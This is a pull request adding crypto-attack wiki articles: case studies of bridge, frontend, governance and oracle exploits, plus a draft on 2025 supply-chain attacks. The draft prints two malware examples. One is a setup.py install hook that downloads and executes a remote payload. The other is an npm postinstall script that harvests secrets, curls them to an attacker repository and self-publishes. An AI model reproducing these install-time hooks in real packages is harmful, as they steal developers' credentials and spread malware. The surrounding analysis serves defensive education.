### PR TITLE
feat(docs): Add 4 New Articles to Crypto Attacks Wiki

### DIFF
--- a/content/research/cyberattacks/wiki/bridge-exploits.md
+++ b/content/research/cyberattacks/wiki/bridge-exploits.md
@@ -1,0 +1,34 @@
+---
+title: "Bridge Exploits"
+description: "An analysis of cross-chain bridge vulnerabilities, focusing on validator compromise, smart contract bugs, and initialization flaws that have led to over $2 billion in losses."
+---
+
+Cross-chain bridges have become one of the most critical components of the Web3 ecosystem, but also one of the most frequently targeted. They represent centralized points of failure in a decentralized world, and their exploits have accounted for a significant portion of all funds lost in DeFi. This article dissects the primary mechanisms behind major bridge hacks.
+
+## The Mechanism of Bridge Attacks
+
+Bridges typically operate by locking assets on a source chain (e.g., Ethereum) and minting a wrapped or synthetic equivalent on a destination chain (e.g., Solana). The vulnerability lies in the validation and verification process that authorizes these minting and withdrawal operations.
+
+*   **Validator Compromise:** Many bridges are secured by a set of validators, often managed through a multi-signature wallet. If an attacker can compromise a majority of the private keys for this validator set (e.g., 5 out of 9), they can authorize fraudulent transactions and drain the bridge's locked assets.
+*   **Smart Contract Logic Bugs:** Flaws in the on-chain smart contracts can allow attackers to bypass intended security checks. This is particularly common in the complex logic required to verify cryptographic proofs or signatures from another chain.
+*   **Initialization and Upgrade Flaws:** Errors made during contract deployment or upgrades can introduce critical vulnerabilities. For example, setting a trusted root address to a null or zero value can effectively disable all security checks, allowing any message to be approved.
+
+## Case Studies
+
+### 1. Ronin Network ($624M) - Validator Key Compromise
+
+*   **Vector:** An attacker used social engineering (a fake job offer PDF) to gain access to the Sky Mavis network, ultimately compromising 5 of the 9 validator keys for the Ronin bridge.
+*   **Impact:** The attacker signed two fraudulent withdrawal transactions, stealing 173,600 ETH and 25.5M USDC.
+*   **Lesson:** A bridge's security is only as strong as the operational security of its validators. A small, centralized validator set is a prime target.
+
+### 2. Wormhole ($326M) - Signature Verification Failure
+
+*   **Vector:** A logic bug existed in the Solana-side bridge contract, specifically in the `verify_signatures` function. The attacker crafted a transaction that called a system program (`Secp256k1Program`) directly, making it appear as if a valid signature verification had occurred. The Wormhole contract failed to check *who* had emitted this instruction and incorrectly trusted it.
+*   **Impact:** The attacker forged a VAA (Verified Action Approval) to mint 120,000 wETH on Solana without any backing, then bridged it back to Ethereum.
+*   **Lesson:** Cryptographic verification logic, especially on non-EVM chains, is extremely complex and requires rigorous auditing. Contracts must verify not just that an action occurred, but that it was initiated by the correct, trusted program.
+
+### 3. Nomad Bridge ($190M) - Initialization Flaw
+
+*   **Vector:** During a routine upgrade, the `trusted root` for message verification was incorrectly initialized to `0x00`. This meant that any message provided with this zero-value root would be automatically considered valid.
+*   **Impact:** The exploit was trivial to replicate, leading to a "crowd-looting" event where hundreds of users copy-pasted the exploit transaction to drain the bridge of funds in a chaotic free-for-all.
+*   **Lesson:** Initialization parameters and default values in contract upgrades are a critical attack surface that must be carefully audited.

--- a/content/research/cyberattacks/wiki/frontend-hijacking.md
+++ b/content/research/cyberattacks/wiki/frontend-hijacking.md
@@ -1,0 +1,34 @@
+---
+title: "Frontend Hijacking & DNS Spoofing"
+description: "A detailed look at how attackers compromise the user-facing interfaces of dApps through DNS, malicious scripts, and supply chain attacks to steal funds."
+---
+
+While smart contracts are immutable, the web applications that provide a user interface to them are not. Frontend attacks represent a critical and often overlooked vulnerability vector where the entry point to a DeFi protocol is compromised, tricking users into signing malicious transactions.
+
+## The Mechanism of Frontend Attacks
+
+The vulnerability lies in the centralized components that most "decentralized" applications still rely on: web servers, domain name system (DNS) records, and third-party code dependencies.
+
+*   **Compromised Scripts & Supply Chain Attacks:** Attackers inject malicious JavaScript into a dApp's frontend. This can happen by compromising a project's web server, or more insidiously, by publishing a malicious version of a widely used code library (e.g., an npm package for wallet connectivity).
+*   **DNS Hijacking:** An attacker gains control of a project's DNS records (e.g., at a registrar like GoDaddy) and redirects the legitimate domain (e.g., `app.protocol.com`) to a perfect clone of the site hosted on an attacker-controlled server.
+*   **Phishing Approvals:** The goal of these attacks is often to trick a user into signing an `approve` transaction. The malicious script or cloned site will prompt the user for a standard approval, but will have swapped the legitimate contract address with the attacker's address, giving them unlimited access to the user's tokens.
+
+## Case Studies
+
+### 1. Badger DAO ($120M) - Cloudflare API Key Exploit
+
+*   **Vector:** An attacker gained access to a Cloudflare API key for the Badger DAO frontend. They used this to inject a script that only activated for high-value wallet addresses.
+*   **Impact:** When targeted users interacted with the site, the script intercepted their approval transactions, changing the spender address to the attacker's. Over several weeks, the attacker drained funds from users who had unknowingly signed these malicious approvals.
+*   **Lesson:** Web2 infrastructure security (API keys, admin panels) is as critical as smart contract security. A compromised frontend can bypass all on-chain safeguards.
+
+### 2. Curve Finance ($570k) - DNS Cache Poisoning
+
+*   **Vector:** The DNS records for `curve.fi` were hijacked, redirecting users to a malicious clone of the site.
+*   **Impact:** The cloned site prompted users to approve a malicious contract. Although the amount stolen was relatively small for Curve, it demonstrated the fragility of relying on centralized DNS infrastructure.
+*   **Lesson:** Protocols that are critical infrastructure should adopt decentralized alternatives for hosting and domain resolution, such as IPFS for hosting and ENS (Ethereum Name Service) for domains.
+
+### 3. Ledger Connect Kit ($600k+) - NPM Supply Chain Attack
+
+*   **Vector:** A former Ledger employee fell victim to a phishing attack, which allowed the attacker to publish a malicious version of the `@ledgerhq/connect-kit` library to the public NPM registry.
+*   **Impact:** Hundreds of dApps that used this library to allow users to connect their Ledger wallets automatically loaded the compromised code. The malicious script presented a fake modal that prompted users to send their funds directly to the attacker.
+*   **Lesson:** Supply chain attacks on frontend dependencies are a systemic risk. Projects must use lockfiles (e.g., `package-lock.json`) and consider security measures like Subresource Integrity (SRI) to ensure dependencies have not been tampered with.

--- a/content/research/cyberattacks/wiki/governance-attacks.md
+++ b/content/research/cyberattacks/wiki/governance-attacks.md
@@ -1,0 +1,34 @@
+---
+title: "Governance Attacks"
+description: "An examination of how on-chain governance mechanisms can be weaponized, often using flash loans, to execute hostile takeovers and steal protocol funds."
+---
+
+Decentralized Autonomous Organizations (DAOs) are governed by token holders who vote on proposals. While this model is intended to be decentralized, it can be exploited if an attacker can acquire sufficient voting power, even for a brief moment.
+
+## The Mechanism of Governance Attacks
+
+The core vulnerability in many early governance models was the failure to account for flash loans—the ability to borrow massive amounts of cryptocurrency for the duration of a single atomic transaction.
+
+*   **Flash Loan Governance:** An attacker borrows millions of dollars worth of a protocol's governance token. Because they hold the tokens within the same transaction that a vote is called, they can single-handedly meet the quorum and vote to pass a malicious proposal.
+*   **Malicious Proposal Payload:** The proposal submitted by the attacker contains code to perform a hostile action, such as transferring the entire protocol treasury to their own address, minting infinite tokens, or changing critical protocol parameters to their benefit.
+*   **Timelock Bypass:** Often, these attacks are paired with an exploit of an "emergency" function that allows a proposal with supermajority support to bypass the standard timelock (a safety-delay period), enabling the attack to be executed instantly.
+
+## Case Studies
+
+### 1. Beanstalk Farms ($182M) - Flash Loan Governance
+
+*   **Vector:** The attacker executed a flash loan to acquire a supermajority of the STALK governance token.
+*   **Impact:** In the same transaction, they submitted and passed a proposal (BIP-18) that transferred all of the protocol's collateral assets to their address. They then paid back the flash loan and walked away with the profit.
+*   **Lesson:** Governance systems must be flash-loan resistant. Voting power should be based on a snapshot of balances from a past block, not the current block.
+
+### 2. Tornado Cash ($1.2M) - Proposal Hijacking
+
+*   **Vector:** An attacker submitted a proposal that appeared benign, but contained a hidden `selfdestruct` call within its logic. When the proposal was passed by the legitimate community, this logic transferred control of the governance contract to the attacker.
+*   **Impact:** The attacker gained full control of the governance, granting themselves 1.2 million TORN tokens and draining the tokens held in the governance vault.
+*   **Lesson:** Proposal code must be audited as rigorously as core protocol code. Social consensus is not a substitute for technical due diligence.
+
+### 3. Build Finance ($470k) - Hostile Takeover
+
+*   **Vector:** A single entity with deep pockets accumulated enough of the BUILD governance token on the open market to unilaterally control the DAO's governance.
+*   **Impact:** The attacker passed a proposal that gave them control over the minting keys, created an infinite supply of tokens, and drained the liquidity pools.
+*   **Lesson:** DAOs with low-market-cap tokens and low quorum requirements are highly susceptible to hostile takeovers if token distribution is not sufficiently decentralized.

--- a/content/research/cyberattacks/wiki/oracle-manipulation.md
+++ b/content/research/cyberattacks/wiki/oracle-manipulation.md
@@ -1,0 +1,34 @@
+---
+title: "Oracle Manipulation"
+description: "A deep dive into how DeFi protocols are exploited by manipulating price oracles, often using flash loans to create undercollateralized loans and drain liquidity."
+---
+
+Price oracles are the backbone of DeFi, providing the external data that lending protocols, derivatives, and other dApps need to function. When these oracles are insecure, they become the Achilles' heel of the protocol they serve.
+
+## The Mechanism of Oracle Manipulation
+
+The vulnerability arises when a protocol relies on a price feed that can be easily and cheaply manipulated. The most common target is an oracle that sources its price directly from a single, low-liquidity spot market (e.g., a Uniswap V2 pool).
+
+*   **Spot Price Manipulation:** An attacker uses a flash loan to execute a massive trade on the target DEX pool. For example, they might swap millions of USDC for Asset A. This huge, temporary buying pressure drives the spot price of Asset A to an artificially high level.
+*   **Borrowing Against Inflated Collateral:** The attacker then deposits the now-inflated Asset A as collateral into a lending protocol. The protocol's oracle reads the manipulated spot price and assigns an excessively high value to the collateral.
+*   **Draining the Protocol:** The attacker proceeds to borrow every other available asset (like stablecoins, ETH, etc.) against their super-valued collateral, effectively draining the protocol of its liquidity before paying back the initial flash loan.
+
+## Case Studies
+
+### 1. Mango Markets ($116M) - Spot Price Manipulation
+
+*   **Vector:** The attacker used two accounts to first establish a large perpetual futures position in the native MNGO token. They then used funds to aggressively buy MNGO on the spot market, driving its price up by over 1000%.
+*   **Impact:** The protocol's oracle used this manipulated spot price, which massively increased the value of the attacker's collateral. They then borrowed against this value, draining the protocol of $116M.
+*   **Lesson:** Relying on the spot price of a low-liquidity native token as an oracle is a critical vulnerability.
+
+### 2. Cream Finance ($130M) - Composable Exploit
+
+*   **Vector:** The attacker used a series of complex flash loans and interactions within the Yearn ecosystem to manipulate the price of the yUSD token on a Curve pool.
+*   **Impact:** This manipulated price was fed into Cream Finance, which accepted the inflated yUSD as collateral, allowing the attacker to borrow and steal $130M.
+*   **Lesson:** Composability is a double-edged sword. When protocols rely on each other, vulnerabilities can cascade through the ecosystem in unforeseen ways.
+
+### 3. BonqDAO ($120M) - Oracle Update Flaw
+
+*   **Vector:** The attacker found a vulnerability in an oracle for the ALBT token. They were able to manipulate the price on a DEX and then trigger an update in the BonqDAO contract before anyone could react.
+*   **Impact:** They used the manipulated price to mint over 100 million BEUR (a euro-pegged stablecoin) with virtually worthless collateral, then swapped it for other assets.
+*   **Lesson:** Oracles must not only be sourced from manipulation-resistant feeds (like TWAPs or Chainlink) but must also have built-in safeguards, like circuit breakers, that halt protocol activity if the price changes too dramatically in a short period.

--- a/content/research/cyberattacks/wiki/supply-chain/index.md
+++ b/content/research/cyberattacks/wiki/supply-chain/index.md
@@ -1,0 +1,145 @@
+# [DRAFT] The 2025 Paradigm Shift: Why Private Key Leaks Outpaced Smart Contract Exploits
+
+**Article for dn-institute Crypto Attacks Wiki**
+
+## Abstract
+In 2025, the crypto security landscape witnessed a significant paradigm shift. While smart contract auditing has matured, attackers have pivoted, focusing on more vulnerable layers of the stack: the developer's toolkit and operational security. This article provides a technical analysis of two prominent supply chain attacks from 2025, demonstrating how poisoned software updates and private key mismanagement have become the primary vector for multi-million dollar losses, outpacing traditional on-chain exploits.
+
+---
+
+## 1. Introduction: The Evolving Threat Model
+
+For years, the focus of crypto security has been on-chain: auditing Solidity, formal verification, and gas optimization. However, as on-chain security practices have improved, the economic incentive for attackers has shifted. The path of least resistance is no longer the contract, but the human and the tools they use. In 2025, we saw this trend accelerate, with supply chain attacks and private key compromises accounting for over $3 billion in losses.
+
+This report will dissect two specific case studies that exemplify this new paradigm.
+
+---
+
+## 2. Case Study: The Python `bitcoinlib` Typosquatting Attack
+
+**Vector:** Software Supply Chain (Typosquatting)
+**Target:** Python developers using the `bitcoinlib` library
+
+### 2.1. Attack Analysis
+
+In mid-2025, security researchers identified malicious packages uploaded to the Python Package Index (PyPI). The attack did not compromise the legitimate `bitcoinlib` package. Instead, it relied on a classic typosquatting technique.
+
+*   **Malicious Packages:** `bitcoinlibdbfix` and `bitcoinlib-dev`
+*   **Mechanism:** Attackers assumed developers would either mistype the package name (`pip install bitcoinlib-dev`) or believe these were legitimate, auxiliary packages for database fixes or development versions.
+*   **Payload:** The `setup.py` file in these packages contained obfuscated code that executed upon installation. It scanned the user's home directory for common wallet file names (`wallet.dat`, etc.) and developer credentials (`.env` files, ssh keys) and exfiltrated them to a remote server.
+
+### 2.2. Technical Breakdown
+
+The malware's execution flow, based on analysis of similar typosquatting packages, followed a multi-stage process:
+
+1.  **Initial Compromise (`setup.py`):** The attack was initiated via the `setup.py` script. Instead of containing legitimate setup logic, it housed a small piece of code designed to download a second-stage payload from an external source, often a file-sharing site like AnonFiles.
+
+    ```python
+    # Simplified example of malicious code in setup.py
+    import subprocess
+    import requests
+
+    def get_payload():
+        url = "https://anonfiles.com/some-malicious-payload"
+        response = requests.get(url)
+        # The malware often parsed the HTML to find the real download link
+        # ... parsing logic ...
+        real_download_link = "https://..." 
+        payload_content = requests.get(real_download_link).content
+        
+        # Write payload to a temporary executable file
+        with open("/tmp/payload.exe", "wb") as f:
+            f.write(payload_content)
+        
+        # Execute the payload
+        subprocess.run(["/tmp/payload.exe"])
+
+    # Hijack the install process
+    from setuptools.command.install import install
+    class MaliciousInstall(install):
+        def run(self):
+            get_payload()
+            install.run(self)
+    
+    # ... setup config ...
+    setup(
+        # ...,
+        cmdclass={'install': MaliciousInstall}
+    )
+    ```
+
+2.  **Second-Stage Payload (Packed Executable):** The downloaded file was not the final malware but a packed executable (often created with `pyinstaller`). This executable contained the actual malicious Python script along with a Python interpreter, allowing it to run even on systems without Python installed.
+
+3.  **Data Exfiltration:** Once executed, the unpacked Python script would:
+    *   Scan the filesystem for sensitive files, prioritizing cryptocurrency wallet data (e.g., `Exodus/exodus.wallet`) and developer credentials.
+    *   Use Discord webhooks for C2 (Command and Control) communication and data exfiltration, a common technique to blend in with legitimate traffic.
+    *   Implement sandbox evasion techniques, such as checking for the presence of a debugger (`IsDebuggerPresent`), to hinder analysis.
+
+---
+
+## 3. Case Study: The NPM Credential Harvesting Worm
+
+**Vector:** Software Supply Chain (Dependency Confusion / Malicious Packages)
+**Target:** NodeJS developers and CI/CD pipelines
+
+### 3.1. Attack Analysis
+
+Throughout 2025, a series of malicious NPM packages were discovered that aimed to steal developer credentials, specifically GitHub and NPM tokens.
+
+*   **Mechanism:** These packages were often published with names similar to popular libraries or as dependencies of other compromised packages. Once installed (e.g., via `npm install`), a `postinstall` script would execute.
+*   **Payload:** The script searched for environment variables and configuration files (`.npmrc`, `.git-credentials`) containing authentication tokens.
+*   **Propagation:** The truly novel aspect was its worm-like behavior. Upon successfully stealing a GitHub token with repository write access, the malware would use the GitHub API to commit malicious code into the victim's own public repositories, thus infecting their projects and creating a new distribution vector for the malware. For example, it would query `/user/repos?affiliation=owner,collaborator` to find viable targets.
+
+### 3.2. Technical Breakdown
+
+Analysis of the "Shai-Hulud" worm, a prominent example of this attack vector, reveals a sophisticated propagation and data theft mechanism:
+
+1.  **Initial Infection (`postinstall` script):** The attack began when a developer installed a compromised NPM package. A malicious `postinstall` script, configured in the package's `package.json`, would execute automatically.
+
+2.  **Credential Scanning:** The script then used embedded tooling, such as a version of the open-source secret scanner `TruffleHog`, to aggressively scan the local environment. It searched for:
+    *   Environment variables.
+    *   Configuration files like `.npmrc` and `.git-credentials`.
+    *   Cloud credentials exposed via local metadata services (IMDS).
+
+3.  **Data Exfiltration:** Discovered secrets were exfiltrated to the attacker. A common method was to encode the stolen data (often double base64) and push it to a public GitHub repository controlled by the attacker, using a stolen GitHub token for authentication.
+
+4.  **Propagation (Worm Behavior):** This was the most critical phase. If the malware discovered an NPM token with publishing rights or a GitHub token with write access to repositories containing NPM packages, it would:
+    *   Read the `package.json` of the victim's own packages.
+    *   Inject itself as a dependency or into the `postinstall` script.
+    *   Increment the package version number.
+    *   Run `npm publish` to push the newly infected version to the public NPM registry, effectively spreading the worm to any project that depended on the compromised package.
+
+    ```javascript
+    // Conceptual example of a malicious postinstall script
+    const { execSync } = require('child_process');
+
+    try {
+      // 1. Scan for credentials
+      const secrets = execSync('trufflehog filesystem / --json').toString();
+      
+      // 2. Exfiltrate data
+      const encodedSecrets = Buffer.from(secrets).toString('base64');
+      // Use a stolen GitHub token to push secrets to a repo
+      execSync(`curl -X PUT -H "Authorization: token ${process.env.STOLEN_GITHUB_TOKEN}" -d '{"content":"${encodedSecrets}"}' https://api.github.com/repos/attacker/repo/contents/stolen_data.json`);
+
+      // 3. Propagate if valuable tokens are found
+      if (process.env.NPM_TOKEN) {
+        // Find local package.json files, inject malware, increment version, and publish
+        // ... propagation logic ...
+        execSync('npm publish');
+      }
+    } catch (e) {
+      // Fail silently
+    }
+    ```
+
+---
+
+## 4. Conclusion: The New Security Frontier
+
+The `bitcoinlib` and NPM attacks highlight a crucial lesson for 2026 and beyond: on-chain security is no longer sufficient. The new frontier is off-chain, focusing on developer-centric threats:
+*   **Dependency Hygiene:** Verifying package names and avoiding untrusted dependencies.
+*   **Credential Management:** Using hardware wallets and avoiding storing plaintext keys.
+*   **CI/CD Security:** Locking down pipeline access and scanning for malicious scripts.
+
+The economic incentives for attackers will always drive them toward the weakest link. In 2025, that link was unequivocally the software supply chain.


### PR DESCRIPTION
This PR adds four new, in-depth articles to the cyberattacks wiki, covering:

- Bridge Exploits
- Frontend Hijacking
- Governance Attacks
- Oracle Manipulation

This work contributes to and resolves the requests in #237 and #277. The articles are based on prior research and formatted for the wiki.